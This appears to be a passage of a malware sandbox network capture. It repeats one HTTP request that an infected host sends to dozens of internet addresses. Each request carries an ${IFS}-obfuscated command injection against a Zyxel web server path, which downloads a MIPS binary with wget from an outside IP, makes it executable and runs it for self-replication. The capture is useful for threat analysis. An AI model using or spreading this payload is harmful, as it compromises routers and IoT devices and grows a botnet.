                                                  Jan 19, 2024 18:24:09.329741955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7727192.168.2.135194290.193.168.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329772949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7728192.168.2.135528238.87.246.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329830885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7729192.168.2.136097837.112.202.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329849005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7730192.168.2.1348346137.186.223.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329916954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7731192.168.2.1360942116.206.32.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329946041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7732192.168.2.134822862.30.145.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.329972982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7733192.168.2.134343248.68.124.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330022097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7734192.168.2.1338662109.36.59.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330054998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7735192.168.2.1345782178.79.97.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330096960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7736192.168.2.1336644107.90.192.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330127954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7737192.168.2.134796066.104.59.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330159903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7738192.168.2.135891435.23.241.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330200911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7739192.168.2.135785890.165.36.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330252886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7740192.168.2.133794012.195.184.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330284119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7741192.168.2.1346226196.202.122.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330308914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7742192.168.2.1348202221.160.175.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330363035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7743192.168.2.13570584.232.13.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330401897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7744192.168.2.1351902171.224.8.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330456018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7745192.168.2.1334336140.39.141.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330486059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7746192.168.2.134684225.85.55.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330524921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7747192.168.2.1338628131.103.229.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330549002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7748192.168.2.1334570129.64.66.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330607891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7749192.168.2.1345048118.81.238.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330655098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7750192.168.2.135400481.30.191.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330682039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7751192.168.2.1355866162.154.180.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330730915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7752192.168.2.1352294140.114.3.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330785990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7753192.168.2.134689813.102.82.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330804110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7754192.168.2.1352508202.52.15.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330869913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7755192.168.2.1358984125.132.56.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330918074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7756192.168.2.134544012.101.72.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.330977917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7757192.168.2.1358782145.117.17.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331016064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7758192.168.2.1343364149.224.69.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331053019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7759192.168.2.1353618177.250.192.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331089973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7760192.168.2.1348466220.233.36.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331125021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7761192.168.2.135053085.226.103.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331146955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7762192.168.2.1353432182.164.133.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331168890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7763192.168.2.133852252.33.55.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331204891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7764192.168.2.133277875.34.124.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331242085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7765192.168.2.135570240.94.131.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331274033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7766192.168.2.134097066.129.55.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331316948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7767192.168.2.1346648184.146.133.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331351995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7768192.168.2.133573298.140.164.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331382990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7769192.168.2.1348902114.62.26.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331439018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7770192.168.2.134505898.34.136.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331470013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7771192.168.2.1352672137.7.154.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331516027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7772192.168.2.1339652183.178.142.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331547976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7773192.168.2.1343056187.130.37.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331597090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7774192.168.2.13597321.125.77.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331644058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7775192.168.2.1349556126.8.29.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331676960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7776192.168.2.134456237.97.177.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331721067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7777192.168.2.1332990212.91.249.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331753016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7778192.168.2.1351922209.152.65.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331779957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7779192.168.2.1352126223.66.148.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331830978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7780192.168.2.1345734182.206.243.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331867933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7781192.168.2.135916059.156.105.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331903934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7782192.168.2.1358884210.104.125.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331948042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7783192.168.2.1334470177.231.8.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.331965923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7784192.168.2.1343538212.48.122.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332010984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7785192.168.2.1343928171.68.255.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332062006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7786192.168.2.1356144223.42.10.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332094908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7787192.168.2.1336566122.161.37.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332130909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7788192.168.2.1345806222.124.100.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:09.332161903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7789192.168.2.135850070.45.134.155443
                                                  TimestampBytes transferredDirectionData
